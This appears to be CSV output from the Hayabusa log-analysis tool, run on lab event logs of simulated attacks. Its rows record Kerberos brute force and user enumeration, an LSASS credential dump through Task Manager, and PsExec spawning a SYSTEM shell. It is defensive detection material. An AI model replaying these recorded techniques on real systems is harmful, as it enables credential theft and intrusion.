-,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.385 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,"User: m,og | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -",../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.389 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: go | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.392 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nd | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.395 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bdcy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.398 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rec | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.401 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.405 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: accrt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.408 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: wyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.410 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.413 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.416 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ytuntsr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.420 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vga | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.423 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tfay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.426 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sef | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.430 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: gsdf | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.433 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sfs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:23.180 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: HealthMailboxf49e2c8 | Svc: krbtgt | IP Addr: ::ffff:10.23.42.16 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-03 21:06:03.488 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:03.493 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Guest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:03.497 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: DefaultAccount | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:03.510 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: krbtgt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:03.847 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:04.904 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Test-ADM | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:04.910 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:06.986 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: $P51000-50I28MP5JB3E | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:07.006 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_27d255b6407743b08 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:07.010 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2b6f1a51ac6c41b2a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:07.014 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_25e3b4425ffd47aab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:07.021 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_8b9faa99d83446d1b | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:07.031 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_6aaeeb113c0c4af3a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:07.035 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2f6964c8f421408ab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:07.047 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_374806bcc65140a5a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:07.052 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_b2a35e76f50a4c23a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:07.056 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_957258b5879242afb | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:11.514 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hack1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:11.878 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hacker2 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-03 21:06:12.553 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dsrm | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 2021-12-05 05:59:31.403 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x13a4 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Task Manager access indicator for potential LSASS dump.evtx 2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Users\admmig\AppData\Local\Temp\lsass (4).DMP | Process: C:\Windows\System32\Taskmgr.exe | PID: 3504 | PGUID: A57649D1-D6B1-61AB-A5E4-D70100000000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx 2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx 2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx 2021-12-05 06:19:16.741 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | Cmd: PsExec64.exe -i -s cmd | Process: C:\TOOLS\PsExec64.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x83ef56 | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000 | Hash: SHA1=FB0A150601470195C47B4E8D87FCB3F50292BEB2,MD5=9321C107D1F7E336CDA550A2BF049108,SHA256=AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4,IMPHASH=159D56D406180A332FBC99290F30700E",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | SetValue: HKU\S-1-5-21-4230534742-2542757381-3142984815-1111\Software\Sysinternals\PsExec\EulaAccepted: DWORD (0x00000001) | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/file_event/file_event_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,low,ResDev,Usage of Sysinternals Tools,,../hayabusa-rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: System | PID: 4 | PGUID: A57649D1-92D1-61A4-EB03-000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 540 | PGUID: A57649D1-DB54-61AB-0467-DC0100000000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 06:19:17.757 +09:00,fs03vuln.offsec.lan,22,info,,DNS Query,Query: fs03vuln | Result: 10.23.42.38; | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,../hayabusa-rules/hayabusa/sysmon/events/22_DNS-Query.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" 2021-12-05 07:09:13.666 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8ef8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx 2021-12-05 07:09:13.671 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP 